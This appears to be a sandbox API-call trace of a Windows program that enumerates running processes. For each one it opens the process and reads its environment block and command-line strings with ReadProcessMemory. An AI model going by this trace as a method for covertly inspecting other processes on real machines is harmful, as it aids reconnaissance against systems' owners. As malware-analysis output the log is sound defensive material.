[0404.451] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x511ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.451] malloc (_Size=0x6a) returned 0x2c4740
[0404.451] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x512750, lpBuffer=0x2c4740, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.451] free (_Block=0x2c4740)
[0404.452] CloseHandle (hObject=0x240) returned 1
[0404.453] _ui64tow (_Value=0x830, _Buffer="1848", _Radix=10) returned="2096"
[0404.457] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2096") returned 4
[0404.459] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.459] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.483] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x240
[0404.483] GetLastError () returned 0x0
[0404.483] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.483] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.483] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.484] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x72950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.484] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x726fa, lpBuffer=0x12dd100, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.485] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.486] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.486] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.486] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x71ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.487] malloc (_Size=0x7e) returned 0x2c4740
[0404.487] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x72770, lpBuffer=0x2c4740, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.487] free (_Block=0x2c4740)
[0404.488] CloseHandle (hObject=0x240) returned 1
[0404.489] _ui64tow (_Value=0x868, _Buffer="2096", _Radix=10) returned="2152"
[0404.493] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2152") returned 4
[0404.494] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.495] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x868) returned 0x240
[0404.518] GetLastError () returned 0x0
[0404.518] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f26e0, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.520] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.524] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.524] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.524] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.525] malloc (_Size=0x72) returned 0x2c4740
[0404.525] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f274a, lpBuffer=0x2c4740, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.525] free (_Block=0x2c4740)
[0404.526] CloseHandle (hObject=0x240) returned 1
[0404.527] _ui64tow (_Value=0x878, _Buffer="2152", _Radix=10) returned="2168"
[0404.531] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2168") returned 4
[0404.533] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.533] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.556] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x878) returned 0x240
[0404.556] GetLastError () returned 0x0
[0404.556] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.556] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.556] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.557] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x482960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.557] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4826fa, lpBuffer=0x12dd100, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.558] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.559] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.559] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.560] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x481ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.560] malloc (_Size=0x84) returned 0x2c4740
[0404.560] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x482776, lpBuffer=0x2c4740, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.560] free (_Block=0x2c4740)
[0404.561] CloseHandle (hObject=0x240) returned 1
[0404.562] _ui64tow (_Value=0x884, _Buffer="2168", _Radix=10) returned="2180"
[0404.566] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2180") returned 4
[0404.568] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.568] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.590] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x884) returned 0x240
[0404.591] GetLastError () returned 0x0
[0404.591] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x442930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.592] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4426f6, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.593] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.594] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.594] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.594] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x441ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.594] malloc (_Size=0x72) returned 0x2c4740
[0404.595] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x442760, lpBuffer=0x2c4740, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.595] free (_Block=0x2c4740)
[0404.596] CloseHandle (hObject=0x240) returned 1
[0404.596] _ui64tow (_Value=0x554, _Buffer="2180", _Radix=10) returned="1364"
[0404.606] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1364") returned 4
[0404.607] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.607] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.637] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x554) returned 0x240
[0404.637] GetLastError () returned 0x0
[0404.637] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.637] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.637] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.637] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.638] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b26e8, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.639] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.640] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.640] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.640] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.641] malloc (_Size=0x60) returned 0x2c0790
[0404.641] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b2740, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.641] free (_Block=0x2c0790)
[0404.642] CloseHandle (hObject=0x240) returned 1
[0404.643] _ui64tow (_Value=0x6e8, _Buffer="1364", _Radix=10) returned="1768"
[0404.674] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1768") returned 4
[0404.675] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.675] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.706] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e8) returned 0x240
[0404.706] GetLastError () returned 0x0
[0404.706] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.706] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.706] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.707] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1028d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.707] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1026de, lpBuffer=0x12dd100, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.708] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.709] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.709] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.710] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x101ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.710] malloc (_Size=0x5a) returned 0x2c0790
[0404.710] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x102730, lpBuffer=0x2c0790, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.710] free (_Block=0x2c0790)
[0404.711] CloseHandle (hObject=0x240) returned 1
[0404.712] _ui64tow (_Value=0x888, _Buffer="1768", _Radix=10) returned="2184"
[0404.716] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2184") returned 4
[0404.717] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.717] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x888) returned 0x240
[0404.746] GetLastError () returned 0x0
[0404.746] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.746] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.746] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.746] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x352980, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.747] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x352702, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.748] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.749] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.749] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.749] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x351ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.749] malloc (_Size=0x8a) returned 0x2e1b10
[0404.749] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x352784, lpBuffer=0x2e1b10, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1b10*, lpNumberOfBytesRead=0x0) returned 1
[0404.750] free (_Block=0x2e1b10)
[0404.750] CloseHandle (hObject=0x240) returned 1
[0404.751] _ui64tow (_Value=0x644, _Buffer="2184", _Radix=10) returned="1604"
[0404.759] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1604") returned 4
[0404.761] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.761] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.788] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x240
[0404.788] GetLastError () returned 0x0
[0404.788] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.788] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.788] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.788] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x92910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.789] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x926ee, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.790] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.791] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.791] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.791] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x91ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.792] malloc (_Size=0x6c) returned 0x2c4740
[0404.792] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x92752, lpBuffer=0x2c4740, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.792] free (_Block=0x2c4740)
